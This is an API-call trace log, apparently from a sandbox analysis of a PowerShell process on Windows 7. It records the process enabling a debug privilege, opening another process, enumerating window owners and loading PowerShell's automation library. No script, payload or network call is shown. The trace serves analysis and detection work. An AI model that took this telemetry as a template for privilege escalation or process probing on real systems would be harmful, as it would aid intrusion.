	[0077.459] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xdcf20 | out: TokenHandle=0xdcf20*=0x2ec) returned 1
	[0077.459] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2ccabe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0077.461] CloseHandle (hObject=0x2ec) returned 1
	[0077.465] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x2ec
	[0077.474] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2ccac50, cb=0x200, lpcbNeeded=0xddf38 | out: lphModule=0x2ccac50, lpcbNeeded=0xddf38) returned 1
	[0077.476] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13ff20000, lpmodinfo=0x2ccaec0, cb=0x18 | out: lpmodinfo=0x2ccaec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0077.477] CoTaskMemAlloc (cb=0x804) returned 0x2fc410
	[0077.477] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13ff20000, lpBaseName=0x2fc410, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0077.477] CoTaskMemFree (pv=0x2fc410) 
	[0077.478] CoTaskMemAlloc (cb=0x804) returned 0x2fc410
	[0077.478] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13ff20000, lpFilename=0x2fc410, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0077.478] CoTaskMemFree (pv=0x2fc410) 
	[0077.479] CloseHandle (hObject=0x2ec) returned 1
	[0077.487] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xbc4) returned 0x2ec
	[0077.487] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0xde068 | out: lpExitCode=0xde068*=0x103) returned 1
	[0077.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ccb088, Length=0x20000, ResultLength=0xde030 | out: SystemInformation=0x12ccb088, ResultLength=0xde030*=0x10930) returned 0x0
	[0078.404] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x334
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x324
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.405] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x45c
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x40230, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x614
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x914
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0xb8c
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5e0
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x90
	[0078.406] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.406] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x840
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x844
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x46c
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0xb40
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x914
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x988
	[0078.407] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x914
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x950
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x914
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x914
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x868
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x850
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x830
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x814
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x744
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x2a8
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x534
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5e4
	[0078.408] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5c4
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x58c
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x238
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x584
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x7e8
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x678
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x35c
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x51c
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x360
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x274
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x588
	[0078.409] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0xc8
	[0078.409] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x21c
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5ec
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x334
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x664
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x334
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x664
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x334
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5ec
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5ec
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x550
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x7a0
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x594
	[0078.410] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x564
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x45c
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x548
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x518
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x508
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4ec
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.411] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x45c
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x45c
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x44c
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x7ec
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x45c
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x324
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4a0
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x4022e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x614
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x914
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x914
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0xbc8
	[0078.412] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x854
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x140
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x55c
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x34c
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0xb40
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x988
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x868
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x850
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x830
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x814
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x744
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x2a8
	[0078.413] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x534
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5e4
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5c4
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x58c
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x238
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x584
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x7e8
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x678
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x35c
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x51c
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x360
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x274
	[0078.414] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x588
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0xc8
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x21c
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x664
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x334
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x5ec
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x550
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x7a0
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x594
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x45c
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x508
	[0078.415] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x4ec
	[0078.416] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x45c
	[0078.416] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xddd90 | out: lpdwProcessId=0xddd90) returned 0x7ec
	[0078.419] WerSetFlags () returned 0x0
	[0078.427] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0078.427] CoTaskMemFree (pv=0x0) 
	[0078.428] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xde0f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xde0f0 | out: pulNumLanguages=0xde0f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xde0f0) returned 1
	[0078.428] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xde0f8, pwszLanguagesBuffer=0x2cf0588, pcchLanguagesBuffer=0xde0f0 | out: pulNumLanguages=0xde0f8, pwszLanguagesBuffer=0x2cf0588, pcchLanguagesBuffer=0xde0f0) returned 1
	[0078.443] CoTaskMemAlloc (cb=0x24) returned 0x2fa280
	[0078.443] GetUserDefaultLocaleName (in: lpLocaleName=0x2fa280, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0078.443] CoTaskMemFree (pv=0x2fa280) 
	[0078.551] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0078.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0078.551] CoTaskMemFree (pv=0x27d0e0) 
	[0078.553] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0078.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0078.553] CoTaskMemFree (pv=0x27d0e0) 
	[0078.555] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0078.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0078.555] CoTaskMemFree (pv=0x27d0e0) 
	[0078.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xddac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0078.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xddb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0078.565] SetErrorMode (uMode=0x1) returned 0x1
	[0078.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xddd70 | out: lpFileInformation=0xddd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0078.565] SetErrorMode (uMode=0x1) returned 0x1
	[0078.565] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xddfe0 | out: lpdwHandle=0xddfe0) returned 0x94c
	[0078.566] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cf3e18 | out: lpData=0x2cf3e18) returned 1
	[0078.566] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xddf58, puLen=0xddf50 | out: lplpBuffer=0xddf58*=0x2cf3eb4, puLen=0xddf50) returned 1
	[0078.567] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf3f90, puLen=0xddec0) returned 1
	[0078.567] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0078.567] CoTaskMemAlloc (cb=0x2e) returned 0x2f4510
	[0078.567] lstrcpyW (in: lpString1=0x2f4510, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0078.567] CoTaskMemFree (pv=0x2f4510) 
	[0078.567] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf3fe4, puLen=0xddec0) returned 1
	[0078.567] lstrlenW (lpString="System.Management.Automation") returned 28
	[0078.567] CoTaskMemAlloc (cb=0x3c) returned 0x2fd580
	[0078.567] lstrcpyW (in: lpString1=0x2fd580, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0078.567] CoTaskMemFree (pv=0x2fd580) 
	[0078.567] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf4040, puLen=0xddec0) returned 1
	[0078.567] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0078.567] CoTaskMemAlloc (cb=0x20) returned 0x2fa2e0
	[0078.567] lstrcpyW (in: lpString1=0x2fa2e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0078.567] CoTaskMemFree (pv=0x2fa2e0) 
	[0078.567] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf4080, puLen=0xddec0) returned 1
	[0078.567] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0078.567] CoTaskMemAlloc (cb=0x44) returned 0x2fd580
	[0078.567] lstrcpyW (in: lpString1=0x2fd580, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0078.567] CoTaskMemFree (pv=0x2fd580) 
	[0078.567] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf40e8, puLen=0xddec0) returned 1
	[0078.567] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0078.567] CoTaskMemAlloc (cb=0x76) returned 0x286830
	[0078.567] lstrcpyW (in: lpString1=0x286830, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
